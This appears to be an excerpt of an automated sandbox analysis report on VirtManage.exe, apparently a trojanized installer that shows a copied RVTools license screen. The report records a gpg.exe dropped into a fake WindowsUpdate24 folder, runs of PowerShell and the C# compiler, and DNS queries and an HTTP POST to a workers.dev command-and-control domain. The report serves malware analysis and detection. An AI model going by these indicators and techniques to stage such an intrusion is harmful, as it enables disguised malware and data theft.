Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_00427350 gcry_xcalloc,gpgrt_log_error,gcry_xcalloc,gcry_xcalloc,gcry_free,_gpg_w32_gettext,gpgrt_log_info,_gpg_w32_gettext,gpgrt_log_error,_gpg_w32_gettext,gpgrt_log_error,gcry_cipher_open,gcry_cipher_close,gpg_strerror,gpgrt_log_info,_gpg_w32_gettext,gpgrt_log_error,gpg_strerror,gpgrt_log_info,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_authenticate,gcry_cipher_ctl,gcry_cipher_decrypt,gcry_cipher_checktag,memcpy,gcry_cipher_close,gcry_cipher_decrypt,gcry_cipher_close,gpg_strerror,gpgrt_log_info,gcry_cipher_get_algo_keylen,gcry_cipher_close,gpgrt_log_debug,gcry_cipher_close,gcry_cipher_close,gcry_cipher_close,gpgrt_log_fatal,1_2_00427350
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_0046B3E0 gcry_free,gcry_sexp_release,gcry_free,gcry_free,_gpg_w32_gettext,gpg_strerror,gpgrt_log_error,gcry_malloc_secure,gcry_cipher_decrypt,gpgrt_log_info,gcry_sexp_canon_len,gcry_sexp_sscan,gcry_sexp_find_token,gcry_sexp_cadr,gcry_sexp_release,gcry_sexp_nth_string,gcry_pk_map_name,gcry_free,gcry_pk_algo_info,gcry_pk_algo_info,gcry_sexp_release,gcry_mpi_release,gcry_sexp_find_token,gcry_sexp_length,gcry_sexp_nth,gcry_sexp_nth_string,gcry_pk_map_name,gcry_calloc,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_release,gcry_sexp_extract_param,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_mpi_release,gcry_sexp_find_token,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_free,gcry_mpi_cmp,gcry_calloc,gcry_calloc,gcry_mpi_set_opaque,memset,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_sexp_find_token,gcry_mpi_release,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_release,gcry_sexp_nth_string,gcry_cipher_map_name,gcry_free,gcry_sexp_nth_data,memcpy,gcry_sexp_nth_string,strtol,gcry_free,gcry_sexp_nth_string,gcry_md_map_name,gcry_free,gcry_sexp_nth_data,memcpy,gcry_sexp_nth_string,strtoul,gcry_free,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_string,gcry_pk_map_name,gcry_free,gcry_pk_algo_info,gcry_pk_algo_info,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_sexp_nth_data,gcry_mpi_set_opaque_copy,gcry_mpi_set_flag,memcmp,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_sexp_extract_param,gpg_err_code_from_syserror,gcry_sexp_extract_param,gcry_free,gcry_sexp_release,gcry_sexp_release,gpg_err_code_from_syserror,_gpgrt_log_assert,gcry_mpi_set_flag,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_mpi_release,gcry_mpi_scan,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_string,gcry_sexp_release,gcry_sexp_release,gcry_mpi_cmp,gcry_mpi_get_flag,gcry_calloc,gpg_err_code_from_syserror,gcry_mpi_copy,gpgrt_log_error,gpg_err_code_from_syserror,_gpgrt_log_assert,gcry_mpi_release,gcry_sexp_extract_param,1_2_0046B3E0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_0044E530 gcry_mpi_get_flag,gcry_malloc_secure,memcpy,gcry_cipher_encrypt,memset,gcry_cipher_close,gcry_mpi_set_opaque,gpgrt_log_printhex,gpg_strerror,gpgrt_log_error,gcry_free,gpgrt_log_error,gcry_cipher_close,gpgrt_log_printhex,gpg_err_code_from_syserror,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_cipher_close,1_2_0044E530
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_0044E920 gcry_mpi_get_flag,gcry_mpi_get_opaque,gcry_malloc_secure,memcpy,gcry_cipher_decrypt,gcry_cipher_close,gcry_mpi_scan,gcry_free,gpgrt_log_error,gcry_cipher_close,gpgrt_log_printhex,gpgrt_log_error,gcry_free,gcry_cipher_close,gpgrt_log_printhex,gpg_strerror,gpgrt_log_error,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_cipher_close,1_2_0044E920
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_00454B00 _gpgrt_log_assert,gcry_cipher_decrypt,gcry_md_write,memcpy,gcry_cipher_close,gcry_md_close,gcry_free,_gpgrt_log_assert,_gpgrt_log_assert,_gpgrt_log_assert,gcry_cipher_decrypt,gcry_cipher_close,gcry_md_close,gcry_free,_gpgrt_log_assert,1_2_00454B00
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_0044C0D0 gcry_sexp_build,gcry_sexp_build,gcry_sexp_build,gcry_pk_verify,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_sexp_build,gcry_free,gcry_sexp_build,gcry_mpi_get_nbits,gcry_mpi_release,gcry_mpi_release,gcry_sexp_build,gcry_sexp_build,gcry_sexp_build,gcry_sexp_build,gcry_sexp_build,gcry_free,gcry_mpi_get_nbits,gcry_mpi_copy,gcry_mpi_copy,gcry_mpi_get_flag,gcry_mpi_get_flag,gcry_sexp_build,gpg_err_code_from_syserror,gpg_err_code_from_syserror,gcry_sexp_build,gcry_mpi_get_flag,gcry_mpi_get_flag,gcry_mpi_get_opaque,memcpy,gcry_mpi_set_opaque_copy,gpg_err_code_from_syserror,gcry_mpi_print,memmove,gcry_mpi_set_opaque_copy,_gpgrt_log_assert,gcry_mpi_get_flag,gcry_mpi_get_opaque,memcpy,gcry_mpi_set_opaque_copy,gcry_mpi_get_opaque,memcpy,gcry_mpi_set_opaque_copy,gcry_mpi_print,memmove,gcry_mpi_set_opaque_copy,_gpgrt_log_assert,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_sexp_build,gcry_sexp_release,gcry_sexp_release,gcry_sexp_build,gcry_sexp_build,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_malloc,memcpy,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_mpi_release,gcry_mpi_release,gcry_sexp_build,gcry_free,gcry_mpi_release,gcry_mpi_get_opaque,gcry_free,gpgrt_log_debug,gcry_mpi_dump,gpgrt_log_printf,gpg_err_code_from_syserror,gcry_mpi_release,gcry_sexp_build,_gpgrt_log_assert,_gpgrt_log_assert,_gpgrt_log_assert,gcry_sexp_build,gcry_pk_testkey,gcry_sexp_release,gcry_sexp_build,gcry_sexp_build,gcry_sexp_build,gcry_free,gpg_err_code_from_syserror,3_2_0044C0D0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_00464220 gcry_cipher_open,gcry_sexp_release,gcry_free,gcry_free,gcry_free,gcry_cipher_close,gcry_free,gcry_cipher_setkey,gcry_free,gcry_sexp_release,gcry_sexp_build,gcry_free,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_sexp_build_array,gcry_free,gpgrt_snprintf,gcry_sexp_build,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gpg_strerror,gpgrt_log_error,gcry_sexp_build,gcry_sexp_build,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_malloc,gcry_cipher_encrypt,gcry_free,gcry_free,gcry_mpi_get_flag,gpg_strerror,_gpg_w32_gettext,gpgrt_log_error,gcry_mpi_get_flag,gcry_mpi_get_flag,gcry_mpi_get_flag,gcry_mpi_get_opaque,gpgrt_log_info,gpg_strerror,gpgrt_log_error,_gpg_w32_gettext,gpgrt_log_info,gpg_err_code_from_syserror,gcry_free,gcry_free,_gpg_w32_gettext,gpgrt_log_info,gpg_strerror,gpgrt_log_error,gpgrt_log,abort,gpg_err_code_from_syserror,3_2_00464220
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_00427350 gcry_xcalloc,gpgrt_log_error,gcry_xcalloc,gcry_xcalloc,gcry_free,_gpg_w32_gettext,gpgrt_log_info,_gpg_w32_gettext,gpgrt_log_error,_gpg_w32_gettext,gpgrt_log_error,gcry_cipher_open,gcry_cipher_close,gpg_strerror,gpgrt_log_info,_gpg_w32_gettext,gpgrt_log_error,gpg_strerror,gpgrt_log_info,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_authenticate,gcry_cipher_ctl,gcry_cipher_decrypt,gcry_cipher_checktag,memcpy,gcry_cipher_close,gcry_cipher_decrypt,gcry_cipher_close,gpg_strerror,gpgrt_log_info,gcry_cipher_get_algo_keylen,gcry_cipher_close,gpgrt_log_debug,gcry_cipher_close,gcry_cipher_close,gcry_cipher_close,gpgrt_log_fatal,3_2_00427350
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_0046B3E0 gcry_free,gcry_sexp_release,gcry_free,gcry_free,_gpg_w32_gettext,gpg_strerror,gpgrt_log_error,gcry_malloc_secure,gcry_cipher_decrypt,gpgrt_log_info,gcry_sexp_canon_len,gcry_sexp_sscan,gcry_sexp_find_token,gcry_sexp_cadr,gcry_sexp_release,gcry_sexp_nth_string,gcry_pk_map_name,gcry_free,gcry_pk_algo_info,gcry_pk_algo_info,gcry_sexp_release,gcry_mpi_release,gcry_sexp_find_token,gcry_sexp_length,gcry_sexp_nth,gcry_sexp_nth_string,gcry_pk_map_name,gcry_calloc,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_release,gcry_sexp_extract_param,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_mpi_release,gcry_sexp_find_token,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_free,gcry_mpi_cmp,gcry_calloc,gcry_calloc,gcry_mpi_set_opaque,memset,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_sexp_find_token,gcry_mpi_release,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_release,gcry_sexp_nth_string,gcry_cipher_map_name,gcry_free,gcry_sexp_nth_data,memcpy,gcry_sexp_nth_string,strtol,gcry_free,gcry_sexp_nth_string,gcry_md_map_name,gcry_free,gcry_sexp_nth_data,memcpy,gcry_sexp_nth_string,strtoul,gcry_free,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_string,gcry_pk_map_name,gcry_free,gcry_pk_algo_info,gcry_pk_algo_info,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_sexp_nth_data,gcry_mpi_set_opaque_copy,gcry_mpi_set_flag,memcmp,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_sexp_extract_param,gpg_err_code_from_syserror,gcry_sexp_extract_param,gcry_free,gcry_sexp_release,gcry_sexp_release,gpg_err_code_from_syserror,_gpgrt_log_assert,gcry_mpi_set_flag,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_mpi_release,gcry_mpi_scan,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_string,gcry_sexp_release,gcry_sexp_release,gcry_mpi_cmp,gcry_mpi_get_flag,gcry_calloc,gpg_err_code_from_syserror,gcry_mpi_copy,gpgrt_log_error,gpg_err_code_from_syserror,_gpgrt_log_assert,gcry_mpi_release,gcry_sexp_extract_param,3_2_0046B3E0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_0044E530 gcry_mpi_get_flag,gcry_malloc_secure,memcpy,gcry_cipher_encrypt,memset,gcry_cipher_close,gcry_mpi_set_opaque,gpgrt_log_printhex,gpg_strerror,gpgrt_log_error,gcry_free,gpgrt_log_error,gcry_cipher_close,gpgrt_log_printhex,gpg_err_code_from_syserror,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_cipher_close,3_2_0044E530
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_0044E920 gcry_mpi_get_flag,gcry_mpi_get_opaque,gcry_malloc_secure,memcpy,gcry_cipher_decrypt,gcry_cipher_close,gcry_mpi_scan,gcry_free,gpgrt_log_error,gcry_cipher_close,gpgrt_log_printhex,gpgrt_log_error,gcry_free,gcry_cipher_close,gpgrt_log_printhex,gpg_strerror,gpgrt_log_error,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_cipher_close,3_2_0044E920
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_00454B00 _gpgrt_log_assert,gcry_cipher_decrypt,gcry_md_write,memcpy,gcry_cipher_close,gcry_md_close,gcry_free,_gpgrt_log_assert,_gpgrt_log_assert,_gpgrt_log_assert,gcry_cipher_decrypt,gcry_cipher_close,gcry_md_close,gcry_free,_gpgrt_log_assert,3_2_00454B00
Source: C:\Users\user\Desktop\VirtManage.exeEXE: msiexec.exeJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeEXE: sc.exeJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeEXE: w32tm.exeJump to behavior

Compliance

barindex
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\VirtManage.exeEXE: msiexec.exeJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeEXE: sc.exeJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeEXE: w32tm.exeJump to behavior
Uses 32bit PE files
Source: VirtManage.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Found installer window with terms and condition text
Source: C:\Windows\SysWOW64\msiexec.exeWindow detected: < &BackLicense AgreementDefBannerBitmapMsiHorizontalLinePlease take a moment to read the license agreement now. If you accept the terms below click "I Agree" then "Next". Otherwise click "Cancel".This End User License Agreement (EULA) is between the individual consumer or business entity that will use the Application (You) and Dell Global B.V. (Singapore Branch) the Singapore branch of a company incorporated in The Netherlands with limited liability located at 2 International Business Park The Strategy Tower 2 #01-34 Singapore 609930 (Licensor). This EULA governs Your use of: (a) the object code version of RVTools; (b) updates to such software (Updates); (c) the documentation for such software; and (d) all copies of the foregoing (collectively Application). If You accept this EULA or if You install or use the Application then You agree to this EULA. If You accept this EULA or install or use the Application on behalf of a business entity then You represent that You have authority to take those actions and this EULA will be binding on that business entity. 1. License Grant. 1.1. Right to Use. Subject to and in consideration of your full compliance with the terms and conditions of this EULA Licensor grants to You a personal nonexclusive non-transferable and revocable license to use the Application in accordance with the terms of this EULA. If You are an individual consumer this license grant allows You to use the Application in connection with Your own personal use. If You are a business entity this license grant allows You to use the Application in connection with the internal business operations of Your entity. In addition You may make a reasonable number of copies of the Application solely as needed for backup or archival purposes. 1.2. Third Party Use. If You are a business entity You may allow Your contractors (each a Permitted Third Party) to use the Application solely for the purpose of providing services to You provided that such use is in compliance with this EULA. You are liable for any breach of this EULA by any Permitted Third Party. 1.3. Rights Reserved. The Application is licensed and not sold. Except for the license expressly granted in this EULA Licensor on behalf of itself and its affiliates and suppliers retains all rights in and to the Application. The rights in the Application are valid and protected in all forms media and technologies existing now or hereafter developed. Any use of the Application other than as expressly set forth herein is strictly prohibited. 1.4. Ownership. Licensor on behalf of itself and its affiliates retains ownership of the Application and all related intellectual property rights. If Application is provided to You on removable media (e.g. CD DVD or USB drive) You may own the media on which the Application is recorded. 2. License Conditions. 2.1. You and Your Permitted Third Parties must do the following: A. Run the Application only on the hardware for which it was intended to operate when ap
Source: C:\Windows\SysWOW64\msiexec.exeWindow detected: < &BackLicense AgreementDefBannerBitmapMsiHorizontalLinePlease take a moment to read the license agreement now. If you accept the terms below click "I Agree" then "Next". Otherwise click "Cancel".This End User License Agreement (EULA) is between the individual consumer or business entity that will use the Application (You) and Dell Global B.V. (Singapore Branch) the Singapore branch of a company incorporated in The Netherlands with limited liability located at 2 International Business Park The Strategy Tower 2 #01-34 Singapore 609930 (Licensor). This EULA governs Your use of: (a) the object code version of RVTools; (b) updates to such software (Updates); (c) the documentation for such software; and (d) all copies of the foregoing (collectively Application). If You accept this EULA or if You install or use the Application then You agree to this EULA. If You accept this EULA or install or use the Application on behalf of a business entity then You represent that You have authority to take those actions and this EULA will be binding on that business entity. 1. License Grant. 1.1. Right to Use. Subject to and in consideration of your full compliance with the terms and conditions of this EULA Licensor grants to You a personal nonexclusive non-transferable and revocable license to use the Application in accordance with the terms of this EULA. If You are an individual consumer this license grant allows You to use the Application in connection with Your own personal use. If You are a business entity this license grant allows You to use the Application in connection with the internal business operations of Your entity. In addition You may make a reasonable number of copies of the Application solely as needed for backup or archival purposes. 1.2. Third Party Use. If You are a business entity You may allow Your contractors (each a Permitted Third Party) to use the Application solely for the purpose of providing services to You provided that such use is in compliance with this EULA. You are liable for any breach of this EULA by any Permitted Third Party. 1.3. Rights Reserved. The Application is licensed and not sold. Except for the license expressly granted in this EULA Licensor on behalf of itself and its affiliates and suppliers retains all rights in and to the Application. The rights in the Application are valid and protected in all forms media and technologies existing now or hereafter developed. Any use of the Application other than as expressly set forth herein is strictly prohibited. 1.4. Ownership. Licensor on behalf of itself and its affiliates retains ownership of the Application and all related intellectual property rights. If Application is provided to You on removable media (e.g. CD DVD or USB drive) You may own the media on which the Application is recorded. 2. License Conditions. 2.1. You and Your Permitted Third Parties must do the following: A. Run the Application only on the hardware for which it was intended to operate when ap
PE / OLE file has a valid certificate
Source: VirtManage.exeStatic PE information: certificate valid
Uses secure TLS version for HTTPS connections
Source: unknownHTTPS traffic detected: 104.21.62.135:443 -> 192.168.2.9:49694 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.62.135:443 -> 192.168.2.9:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.62.135:443 -> 192.168.2.9:49759 version: TLS 1.2
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: VirtManage.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Binary contains paths to debug symbols
Source: Binary string: F:\gs2\VS\out\binaries\x86ret\bin\i386\DPCA.pdb source: 7za.exe, 00000007.00000003.952369092.00000189E3440000.00000004.00001000.00020000.00000000.sdmp, MSI32C4.tmp.9.dr
Source: Binary string: F:\gs2\VS\out\binaries\x86ret\bin\i386\DPCA.pdb= source: 7za.exe, 00000007.00000003.952369092.00000189E3440000.00000004.00001000.00020000.00000000.sdmp, MSI32C4.tmp.9.dr
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.pdb source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4F16000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000001E.00000002.1249340927.0000016E3046D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: OLEView.pdb source: 7za.exe, 00000013.00000003.1010646142.000001AC45EBA000.00000004.00001000.00020000.00000000.sdmp, 7za.exe, 00000013.00000003.1010553824.000001AC45EEA000.00000004.00001000.00020000.00000000.sdmp, oleview.exe, 0000001A.00000002.3333907718.00007FF7CD99D000.00000002.00000001.01000000.00000011.sdmp, oleview.exe, 0000001A.00000000.1077218028.00007FF7CD99D000.00000002.00000001.01000000.00000011.sdmp, oleview.exe, 0000001D.00000002.1300919090.00007FF7F609D000.00000002.00000001.01000000.00000015.sdmp, oleview.exe, 0000001D.00000000.1185413739.00007FF7F609D000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000001E.00000002.1251740114.0000016E30589000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb]mb-) source: powershell.exe, 0000001E.00000002.1251921332.0000016E305A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 0000001E.00000002.1218645117.0000016E1620A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Pn.pdb source: powershell.exe, 0000001E.00000002.1249340927.0000016E3046D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: OLEView.pdbGCTL source: 7za.exe, 00000013.00000003.1010646142.000001AC45EBA000.00000004.00001000.00020000.00000000.sdmp, 7za.exe, 00000013.00000003.1010553824.000001AC45EEA000.00000004.00001000.00020000.00000000.sdmp, oleview.exe, 0000001A.00000002.3333907718.00007FF7CD99D000.00000002.00000001.01000000.00000011.sdmp, oleview.exe, 0000001A.00000000.1077218028.00007FF7CD99D000.00000002.00000001.01000000.00000011.sdmp, oleview.exe, 0000001D.00000002.1300919090.00007FF7F609D000.00000002.00000001.01000000.00000015.sdmp, oleview.exe, 0000001D.00000000.1185413739.00007FF7F609D000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.pdbhP source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4F16000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: tomation.pdb{AD.v source: powershell.exe, 0000001E.00000002.1251740114.0000016E30589000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: c:
Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_004068D4 FindFirstFileW,FindClose,0_2_004068D4
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C83
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004CC650 strpbrk,FindFirstFileW,gcry_free,strlen,gcry_malloc,gcry_free,FindNextFileW,FindClose,gcry_free,FindClose,gcry_free,FindClose,1_2_004CC650
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004CC650 strpbrk,FindFirstFileW,gcry_free,strlen,gcry_malloc,gcry_free,FindNextFileW,FindClose,gcry_free,FindClose,gcry_free,FindClose,3_2_004CC650
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 4x nop then push esi1_2_0049C5F0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 4x nop then push esi3_2_0049C5F0
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004016A0 npth_unprotect,__assuan_recvmsg,npth_protect,1_2_004016A0
Source: global trafficDNS traffic detected: DNS query: ec2-52-14-160-176.us-east-2.compute.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: cdn-app-web2.lenete5970.workers.dev
Source: unknownHTTP traffic detected: POST //A3C3Spv34bE/ HTTP/1.1User-Agent: Microsoft Windows NT 10.0.19045.0Content-Type: application/jsonHost: cdn-app-web2.lenete5970.workers.devContent-Length: 111Expect: 100-continueConnection: Keep-Alive
Source: csc.exe, 00000021.00000003.1271041607.000001F1C7AC5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1274600641.000001F1C7AC5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/Date.HijriCalendar.debug.jsT
Source: csc.exe, 00000021.00000003.1271041607.000001F1C7AC5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1274600641.000001F1C7AC5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/Date.HijriCalendar.jsT
Source: csc.exe, 00000021.00000003.1271041607.000001F1C7AC5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1274600641.000001F1C7AC5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/Date.UmAlQuraCalendar.debug.jsT
Source: csc.exe, 00000021.00000003.1271041607.000001F1C7AC5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1274600641.000001F1C7AC5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/Date.UmAlQuraCalendar.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjax.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjax.jsT
